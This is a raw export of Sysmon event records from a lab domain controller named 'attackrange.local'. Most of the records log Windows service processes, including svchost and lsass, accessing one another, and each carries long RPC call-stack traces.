12:02:16.557{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004970Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.557{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004969Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.557{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004968Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.557{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004967Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.542{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004966Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.542{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004965Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.542{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004964Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.542{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004963Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.542{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004962Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.542{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004961Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.542{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004960Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.542{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004959Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.542{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004958Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.542{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004957Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.542{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004956Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.542{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004955Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.542{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004954Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.526{266CAFBE-646C-6064-1300-00000000AE01}12281396C:\Windows\System32\svchost.exe{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+4609|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004953Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.511{266CAFBE-646C-6064-1300-00000000AE01}12281396C:\Windows\System32\svchost.exe{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+2e77|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004952Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.511{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\ImmersiveControlPanel\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64MD5=1036E3DDDC89A4E68D8A33F3823A180E,SHA256=FB5E512425FC9449316EC95969EBE71E2D576DBAB833D61E2A5B9330FD70EE02,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004951Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.495{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004950Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.495{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004949Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.495{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004948Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.495{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004947Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.495{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 